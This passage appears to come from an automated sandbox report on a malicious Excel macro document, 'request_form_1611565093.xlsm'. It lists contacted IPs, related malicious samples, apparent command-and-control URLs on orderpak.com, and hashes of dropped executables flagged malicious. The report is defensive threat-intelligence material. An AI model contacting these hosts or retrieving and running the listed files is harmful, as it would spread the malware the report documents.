http://cps.chambersign.org/cps/chambersignroot.html0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
3.19.60.159	unknown	United States	16509	AMAZON-02US	false
3.14.70.198	unknown	United States	16509	AMAZON-02US	false
50.87.232.245	unknown	United States	46606	UNIFIEDLAYER-AS-1US	false

Private

IP
192.168.0.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	343657
Start date:	25.01.2021
Start time:	10:22:31
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	request_form_1611565093.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.expl.evad.winXLSM@5/15@1/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 83.4%) Quality average: 51.7% Quality standard deviation: 35.1%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 104.43.139.144, 168.61.161.212, 52.109.32.63, 52.109.88.39, 52.109.88.37, 40.88.32.150, 92.122.144.200, 51.104.144.132, 92.122.213.194, 92.122.213.247, 93.184.221.240, 51.103.5.186, 40.126.31.137, 40.126.31.6, 40.126.31.8, 20.190.159.138, 20.190.159.132, 40.126.31.4, 40.126.31.135, 20.190.159.134, 51.11.168.160, 20.54.26.129, 92.122.145.220 Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, arc.msn.com, wu.azureedge.net, www.tm.a.prd.aadg.trafficmanager.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, emea1.notify.windows.com.akadns.net, login.live.com, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, wu.ec.azureedge.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, login.msa.msidentity.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, par02p.wns.notify.trafficmanager.net, dub2.next.a.prd.aadg.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net

Simulations

Behavior and APIs

Time	Type	Description
10:24:53	API Interceptor	1x Sleep call for process: fdcbn.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
50.87.232.245	vbc.exe	Get hash	malicious	Browse	www.orderpak.com/o56q/?ndlpdH=XDZ5Ijx4JZ1SrhRhc7OpDm0ljaIYV1kCiBPJSVnLvpP9fswQcjoWjLKpxNZV8y0sc/oD&v48p-=1bjHLJKXgdz49L7p
	INVOICE3DDH.exe	Get hash	malicious	Browse	www.orderpak.com/o56q/?KX6x=XDZ5Ijx4JZ1SrhRhc7OpDm0ljaIYV1kCiBPJSVnLvpP9fswQcjoWjLKpxNVVvi4vFvoVg+00xA==&LlZ=blyxBdiX2XMl58
	PI.xlsx	Get hash	malicious	Browse	www.orderpak.com/o56q/?NN=XDZ5Ijx9Je1Wrxdte7OpDm0ljaIYV1kCiBXZOW7KrJP8fdcWbz5a1PyryrVT3DgnJZc05A==&nN6896=K0GdBjl8wRId

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	documents_0084568546754.exe	Get hash	malicious	Browse	99.83.185.45
	client.exe	Get hash	malicious	Browse	52.216.129.123
	recteq_v1.6.3_apkpure.com.apk	Get hash	malicious	Browse	3.23.213.135
	recteq_v1.6.3_apkpure.com.apk	Get hash	malicious	Browse	3.23.213.135
	Shipping Document PL&BL Draft.exe	Get hash	malicious	Browse	34.251.18.29
	beacon4.exe	Get hash	malicious	Browse	13.35.43.85
	Payment _Arabian Parts Co BSC#U00a9.exe	Get hash	malicious	Browse	13.248.196.204
	pan0ramic0.jpg.dll	Get hash	malicious	Browse	143.204.214.141
	pan0ramic0.jpg.dll	Get hash	malicious	Browse	13.224.195.167
	pan0ramic0.jpg.dll	Get hash	malicious	Browse	143.204.214.142
	Jan_Order.html	Get hash	malicious	Browse	52.218.240.96
	IFS_1.0.69.apk	Get hash	malicious	Browse	13.224.94.101
	IFS_1.0.69.apk	Get hash	malicious	Browse	52.216.251.116
	open_office_2877604939.exe	Get hash	malicious	Browse	143.204.15.179
	KTFvWHZDMe.exe	Get hash	malicious	Browse	3.137.48.156
	sLUAeV5Er6.exe	Get hash	malicious	Browse	18.144.1.103
	GkrIJKmWHp.exe	Get hash	malicious	Browse	3.131.104.217
	mtsWWNDaNF.exe	Get hash	malicious	Browse	99.83.162.16
	NEW AGREEMENT 2021.xlsx	Get hash	malicious	Browse	35.159.22.77
	Signatures Required 21-01-2021.xlsx	Get hash	malicious	Browse	35.159.22.77
UNIFIEDLAYER-AS-1US	documents_0084568546754.exe	Get hash	malicious	Browse	108.179.242.70
	mr kesh.exe	Get hash	malicious	Browse	108.167.136.53
	79a2gzs3gkk.doc	Get hash	malicious	Browse	162.241.224.176
	INFO.doc	Get hash	malicious	Browse	162.241.224.176
	Electronic form.doc	Get hash	malicious	Browse	192.232.250.227
	file.doc	Get hash	malicious	Browse	162.241.253.129
	Payment_[Ref 72630 - joe.blow].html	Get hash	malicious	Browse	50.87.150.0
	Payment _Arabian Parts Co BSC#U00a9.exe	Get hash	malicious	Browse	74.220.199.6
	request_form_1611306935.xlsm	Get hash	malicious	Browse	162.241.225.18
	file-2021-7_86628.doc	Get hash	malicious	Browse	162.241.253.129
	SecuriteInfo.com.Trojan.Dridex.735.31734.dll	Get hash	malicious	Browse	198.57.200.100
	SecuriteInfo.com.Trojan.Dridex.735.12612.dll	Get hash	malicious	Browse	198.57.200.100
	SecuriteInfo.com.Trojan.Dridex.735.4639.dll	Get hash	malicious	Browse	198.57.200.100
	SecuriteInfo.com.Trojan.Dridex.735.24961.dll	Get hash	malicious	Browse	198.57.200.100
	SecuriteInfo.com.Trojan.Dridex.735.6647.dll	Get hash	malicious	Browse	198.57.200.100
	SecuriteInfo.com.Trojan.Dridex.735.4309.dll	Get hash	malicious	Browse	198.57.200.100
	SecuriteInfo.com.Trojan.Dridex.735.30163.dll	Get hash	malicious	Browse	198.57.200.100
	SecuriteInfo.com.Trojan.Dridex.735.17436.dll	Get hash	malicious	Browse	198.57.200.100
	SecuriteInfo.com.Trojan.Dridex.735.15942.dll	Get hash	malicious	Browse	198.57.200.100
	SecuriteInfo.com.Trojan.Dridex.735.27526.dll	Get hash	malicious	Browse	198.57.200.100
AMAZON-02US	documents_0084568546754.exe	Get hash	malicious	Browse	99.83.185.45
	client.exe	Get hash	malicious	Browse	52.216.129.123
	recteq_v1.6.3_apkpure.com.apk	Get hash	malicious	Browse	3.23.213.135
	recteq_v1.6.3_apkpure.com.apk	Get hash	malicious	Browse	3.23.213.135
	Shipping Document PL&BL Draft.exe	Get hash	malicious	Browse	34.251.18.29
	beacon4.exe	Get hash	malicious	Browse	13.35.43.85
	Payment _Arabian Parts Co BSC#U00a9.exe	Get hash	malicious	Browse	13.248.196.204
	pan0ramic0.jpg.dll	Get hash	malicious	Browse	143.204.214.141
	pan0ramic0.jpg.dll	Get hash	malicious	Browse	13.224.195.167
	pan0ramic0.jpg.dll	Get hash	malicious	Browse	143.204.214.142
	Jan_Order.html	Get hash	malicious	Browse	52.218.240.96
	IFS_1.0.69.apk	Get hash	malicious	Browse	13.224.94.101
	IFS_1.0.69.apk	Get hash	malicious	Browse	52.216.251.116
	open_office_2877604939.exe	Get hash	malicious	Browse	143.204.15.179
	KTFvWHZDMe.exe	Get hash	malicious	Browse	3.137.48.156
	sLUAeV5Er6.exe	Get hash	malicious	Browse	18.144.1.103
	GkrIJKmWHp.exe	Get hash	malicious	Browse	3.131.104.217
	mtsWWNDaNF.exe	Get hash	malicious	Browse	99.83.162.16
	NEW AGREEMENT 2021.xlsx	Get hash	malicious	Browse	35.159.22.77
	Signatures Required 21-01-2021.xlsx	Get hash	malicious	Browse	35.159.22.77

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	creoagent.dll	Get hash	malicious	Browse	50.87.232.245
	creoagent.dll	Get hash	malicious	Browse	50.87.232.245
	case (426).xls	Get hash	malicious	Browse	50.87.232.245
	case (250).xls	Get hash	malicious	Browse	50.87.232.245
	rvYr7FRwkG.dll	Get hash	malicious	Browse	50.87.232.245
	case (1447).xls	Get hash	malicious	Browse	50.87.232.245
	case (850).xls	Get hash	malicious	Browse	50.87.232.245
	SecuriteInfo.com.Heur.18472.xls	Get hash	malicious	Browse	50.87.232.245
	case (1543).xls	Get hash	malicious	Browse	50.87.232.245
	SecuriteInfo.com.FileRepMalware.dll	Get hash	malicious	Browse	50.87.232.245
	case_1581.xls	Get hash	malicious	Browse	50.87.232.245
	case (435).xls	Get hash	malicious	Browse	50.87.232.245
	case (426).xls	Get hash	malicious	Browse	50.87.232.245
	case (61).xls	Get hash	malicious	Browse	50.87.232.245
	BENVAV31BU.html	Get hash	malicious	Browse	50.87.232.245
	IRS_Covid_19_Relief_Grant_Document_docx.exe	Get hash	malicious	Browse	50.87.232.245
	Vivaldi.3.5.2115.87.x64.exe	Get hash	malicious	Browse	50.87.232.245
	8776139.docm	Get hash	malicious	Browse	50.87.232.245
	TeamViewer 14.exe	Get hash	malicious	Browse	50.87.232.245

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	132942
Entropy (8bit):	5.372914488710379
Encrypted:	false
SSDEEP:	1536:JcQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:JrQ9DQW+zBX8P
MD5:	44355DEB0C1B73C85437AB6568BE399B
SHA1:	C3605F95A21EE0FC423D0CA88DBB1C673BAF3815
SHA-256:	83197247F581FA83C9A6ACCF821675A6848684EC8E97D9CE127C3E677F73A11C
SHA-512:	9CED4912422512B5CF0FFF78F7CA4BF8A00C72A0B287387878EF9E3CB21E1BA0340B096ACF1F280CF1D61944155F9AB8590508859DD2A41C39DDB68351AFCC32
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-01-25T09:23:29">.. Build: 16.0.13720.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\13B79D28.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	7.761039651897249
Encrypted:	false
SSDEEP:	24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA
MD5:	600F503BC1066BEB5FB5DD494AA1CD74
SHA1:	A504D5E687B98F9E0FD2896DFC8492DE0F974BE6
SHA-256:	B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3
SHA-512:	B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x....IDATHK..YL.Q......Vl.P. .qC.(....(.".-..q....%1.q./F.Q.L\./4.KlX.Q...EE..(. ..V.i;.z...h..7.0........(...\|s.k.J.Mm].J\|.3........W.&EE..s.hS.}.....%^x`s....s..Rb..9....jw...o.e..17=:!&..X.Q._.!. \|....N$.L.1.N..}.k..v..2.piZ..A.,.l.w......I.{...p...C[......'.........b....:f.\?!3MK........Cb..B.....%`?1..Y>9\....P.......z..uK...g.V.P.U.3...L.j.?(.g.....}.=.}......L.B.{...i.!..-q....9(=%^......&.q.j..>.q...w.NO.@.D..jmnL...U.R0B=6...U....P}Koh.D@"...]9...r,. .."2.......[.~ .......... .ay....nCm'...(..$......_4....*gNT..02h...zT.b.hhF..E.l.Z..J8.....=..H.{....Q...hg.g...u_!...T7./..+...u.....m...C]..E-..ki.CS..2.V..v>.?..$d..U.o.o...w........."....7..g...O]...U`..........g..A.j.....b...\.s(I.......@._B....i..2.I..7W.6....`..!r].P.......^.8n ..X...+3...F.....!x...H..fkYu....y.l...(../.y....,;~qV.R!#C.q...yoE..{O:...R.......c...Z;..[.x.....#N...'....M..@...n0..nD..!..p.!J....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5051E8F4.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	677
Entropy (8bit):	7.433026174405032
Encrypted:	false
SSDEEP:	12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6
MD5:	55E8A29B221E51BE421B7D4F5F5F7E52
SHA1:	117E73181FC9CDAA0904C6372D68EE48CEDC14E4
SHA-256:	B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8
SHA-512:	8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x...JIDATHKc...?...g..l.;k...FF...@H..jb`d..?-P'.SYA......f.........'.?............{K.a..:..W..s.~.....{.....<.....9.......[.=\{.._FN^._{'{3VM?.p..v._....v..;..s...O......\|........yaz....!/...........o..xZ.Sn...O+YP.122.....33.A..3.?.DR...+.F...o.M_..h.W...}..K?.............z..K...........F?..{............\|..`!lX...E.....$.......3... ..0....+.r.D.D7e.&.b...t...../..o.I2.p...yl.J\|.Y0j4Z....!.s#;.XW.gbd`.bb........X..ue...'fi..[1..!.@.......s.:(..e`}.. ...-...1.. J..(`..,}.X...H.>".m?..h .X.D.5Ff......y"4.P.4d...@.A..8.[?..7q....I..M..[.>\{....j..Y3...3.5'......op.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\76CE0C65.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	7.761039651897249
Encrypted:	false
SSDEEP:	24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA
MD5:	600F503BC1066BEB5FB5DD494AA1CD74
SHA1:	A504D5E687B98F9E0FD2896DFC8492DE0F974BE6
SHA-256:	B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3
SHA-512:	B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x....IDATHK..YL.Q......Vl.P. .qC.(....(.".-..q....%1.q./F.Q.L\./4.KlX.Q...EE..(. ..V.i;.z...h..7.0........(...\|s.k.J.Mm].J\|.3........W.&EE..s.hS.}.....%^x`s....s..Rb..9....jw...o.e..17=:!&..X.Q._.!. \|....N$.L.1.N..}.k..v..2.piZ..A.,.l.w......I.{...p...C[......'.........b....:f.\?!3MK........Cb..B.....%`?1..Y>9\....P.......z..uK...g.V.P.U.3...L.j.?(.g.....}.=.}......L.B.{...i.!..-q....9(=%^......&.q.j..>.q...w.NO.@.D..jmnL...U.R0B=6...U....P}Koh.D@"...]9...r,. .."2.......[.~ .......... .ay....nCm'...(..$......_4....*gNT..02h...zT.b.hhF..E.l.Z..J8.....=..H.{....Q...hg.g...u_!...T7./..+...u.....m...C]..E-..ki.CS..2.V..v>.?..$d..U.o.o...w........."....7..g...O]...U`..........g..A.j.....b...\.s(I.......@._B....i..2.I..7W.6....`..!r].P.......^.8n ..X...+3...F.....!x...H..fkYu....y.l...(../.y....,;~qV.R!#C.q...yoE..{O:...R.......c...Z;..[.x.....#N...'....M..@...n0..nD..!..p.!J....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7E715703.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	677
Entropy (8bit):	7.433026174405032
Encrypted:	false
SSDEEP:	12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6
MD5:	55E8A29B221E51BE421B7D4F5F5F7E52
SHA1:	117E73181FC9CDAA0904C6372D68EE48CEDC14E4
SHA-256:	B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8
SHA-512:	8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x...JIDATHKc...?...g..l.;k...FF...@H..jb`d..?-P'.SYA......f.........'.?............{K.a..:..W..s.~.....{.....<.....9.......[.=\{.._FN^._{'{3VM?.p..v._....v..;..s...O......\|........yaz....!/...........o..xZ.Sn...O+YP.122.....33.A..3.?.DR...+.F...o.M_..h.W...}..K?.............z..K...........F?..{............\|..`!lX...E.....$.......3... ..0....+.r.D.D7e.&.b...t...../..o.I2.p...yl.J\|.Y0j4Z....!.s#;.XW.gbd`.bb........X..ue...'fi..[1..!.@.......s.:(..e`}.. ...-...1.. J..(`..,}.X...H.>".m?..h .X.D.5Ff......y"4.P.4d...@.A..8.[?..7q....I..M..[.>\{....j..Y3...3.5'......op.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\30ght3erd[1].exe Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	742003
Entropy (8bit):	4.747274159794167
Encrypted:	false
SSDEEP:	6144:Gb6aZQWqNNmRTKHkZnmHgl1gW9oLeN53f9Pa3JLkK9BOsJ:Gb6afqNNmRnZn79oKpCZL99h
MD5:	DC74FAE0ADA0A2426E77588E3797E040
SHA1:	956EB4FACF7A5BD5E35CFE97898B1D17FEC2643D
SHA-256:	C9AF52899F8EE20E384DE482B81CE82826AF9573C4A1A9C9B761B9C5126B2BB7
SHA-512:	6C4A2786E391D3B23495D2159C56D4C8A49EAC0D18F1FAF4820A1D4CF9C93A5DFEE01DE0D0FE5D9D302F8527061B55B34D650AD3C4704CD98D9962BA3E9603E2
Malicious:	true
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...<..`.........."..................8.........@............................. ............`.................................................8Y..(............... ....9..h.......@....X..................................0...........p[...............................text............................... ..`.rdata..4...........................@..@.data...`6...........h..............@....pdata.. ............t..............@..@.00cfg..(...........................@..@.gehcont............................@..@_RDATA..............................@..@.reloc..@...........................@..B.................~....}.}~.x}..x.x.~}~.~....x.~..x.~.~}x...x...x.x..x.~..w..~...........}.}.}.}...}...}..x..}..~.~.....}x....x.....}.......}.}x.~...~.~...~.}.......}..~.~x......}..}..x.~....x.....x..x.}......}........x.}.}~....~.....}.....~}~...........~..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\9ght3erd[1].exe Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	741995
Entropy (8bit):	4.7473139310932195
Encrypted:	false
SSDEEP:	6144:Gb6aZQWqNNmRTKHkZnmHgl1gW9oLeN53f9Pa3JLkK9BOsJ:Gb6afqNNmRnZn79oKpCZL99h
MD5:	A19EB2AF842C2181E97A503707784E49
SHA1:	D31776ECE6747E05C2D1ADD21813FC5A2CC4B82C
SHA-256:	28F7B47F0A1BBC4037B9E177529FAE56DB286FBC44FEB310DD88603AEA9A7B08
SHA-512:	8EC63B04CC8C9CF7DB84110B3E0342AB880EECD5446C525C9C75199C30E0D9A92B55D9E117DADF3FB2B58698B0686DD57663FC3C21AB386E248D41BE5DDDCEBC
Malicious:	true
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...<..`.........."..................8.........@............................. ............`.................................................8Y..(............... ....9..h.......@....X..................................0...........p[...............................text............................... ..`.rdata..4...........................@..@.data...`6...........h..............@....pdata.. ............t..............@..@.00cfg..(...........................@..@.gehcont............................@..@_RDATA..............................@..@.reloc..@...........................@..B.................~....}.}~.x}..x.x.~}~.~....x.~..x.~.~}x...x...x.x..x.~..w..~...........}.}.}.}...}...}..x..}..~.~.....}x....x.....}.......}.}x.~...~.~...~.}.......}..~.~x......}..}..x.~....x.....x..x.}......}........x.}.}~....~.....}.....~}~...........~..

C:\Users\user\AppData\Local\Temp\6F910000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	17381
Entropy (8bit):	7.264686923554434
Encrypted:	false
SSDEEP:	384:LYqhYs7wu2+SlzY/7ksWuiMEi0pdzG7pIA7BnAyc/:7es7wNtzY/b/iMIz8pIANnAyc/
MD5:	3B3C0579601FACAFBD5CAE5871864B3A
SHA1:	DB051BA82B335D1296283D1F3713A1F5F60D753A
SHA-256:	4F8D7A6B17AC84B0654DB0F99E5C37F58DF2E3C2AB93E96A123F16BA6E82DCE7
SHA-512:	1E51D6CB214A061F736D02736A8575EE70B83C5C27F1BA57BBEDB392056F73C162EAF15BED4853C8472057036BD0FDB68FC78353FFADF8396ABE2E16734AC3C1
Malicious:	false
Reputation:	low
Preview:	.U.n.0....?..........C....I?.&..an.L...;..............pz..y..6.^\t..@...0....M.E4H..b.^........:.6\...#Q.%.....&.<...+..<..R. /'..R.@....!f..P......o..m...w...%g."...yE....j0Q?z..0eP.G..K.2c.."6.B..Lax.i}.\..Wdpx..m..WV+8..8.7....9l.~..fk..S.n..........a.....V.\W...9^.5w.s.....j%.z........W.T.#:..S....>.....K..@....W.#.....n@.1.*..'...........s. .....:..]....83...K.).mb .da.u....#w...J[7`.p.z..~.......PK..........!.................[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Mon Jan 25 17:23:31 2021, atime=Mon Jan 25 17:23:31 2021, length=12288, window=hide
Category:	dropped
Size (bytes):	904
Entropy (8bit):	4.644950793627764
Encrypted:	false
SSDEEP:	12:8eXUhtuElPCH2Aivb9cX+WrjAZ/2bDYUmnRLC5Lu4t2Y+xIBjKZm:8ZQiBcBAZiDUnI87aB6m
MD5:	4770F5BB80BF5889E8E10D8B597E19A8
SHA1:	FE938E245152A576834CAF55E37E5C487F999E92
SHA-256:	E2CDDBECAEEC1E728E82B55BB932C926ACD9B692F17836063919F8149C08C545
SHA-512:	0844CE30E4D9C1BDBC36CB87FD88BE9484AB4D898A638567AA5E2EE0D986F36D484AB423EF4CCCF455314100D91FB4AC967F9B03CBC080F2E6315F211B82E312
Malicious:	false
Reputation:	low
Preview:	L..................F........N....-...e\/G....e\/G....0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..9R.....................:.....q\|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny.9R......S....................$...h.a.r.d.z.....~.1.....9R...Desktop.h.......Ny.9R......Y..............>.......:.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......141700...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	299
Entropy (8bit):	4.7570137735443145
Encrypted:	false
SSDEEP:	6:djYOWwrpmHWwrpmOWwrpmHWwrpmOWwrpmHWwrpmOWwrpc:dMOWsmHWsmOWsmHWsmOWsmHWsmOWsc
MD5:	41D06DC056583FDF30DD901298348E41
SHA1:	6233DCDB67664B7B60D85836AFA188104853CB19
SHA-256:	2617DCDD1334A666016A28DC5AA4CEE89FEF0A9476FDF51FDBEAFB67A6F688AA
SHA-512:	FEB4CC703A4C5EDF12B5213429C74B54472CF31C19B3AF052AD4E09F0C206D7A43FD3B0325E4449FC492DCFE8F7E7C44A6BE559544782E04FC717DBE45806FF5
Malicious:	false
Reputation:	low
Preview:	Desktop.LNK=0..[misc]..request_form_1611565093.xlsm.LNK=0..request_form_1611565093.xlsm.LNK=0..[misc]..request_form_1611565093.xlsm.LNK=0..request_form_1611565093.xlsm.LNK=0..[misc]..request_form_1611565093.xlsm.LNK=0..request_form_1611565093.xlsm.LNK=0..[misc]..request_form_1611565093.xlsm.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\request_form_1611565093.xlsm.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:42 2020, mtime=Mon Jan 25 17:23:31 2021, atime=Mon Jan 25 17:23:31 2021, length=17381, window=hide
Category:	dropped
Size (bytes):	4500
Entropy (8bit):	4.7103504144745445
Encrypted:	false
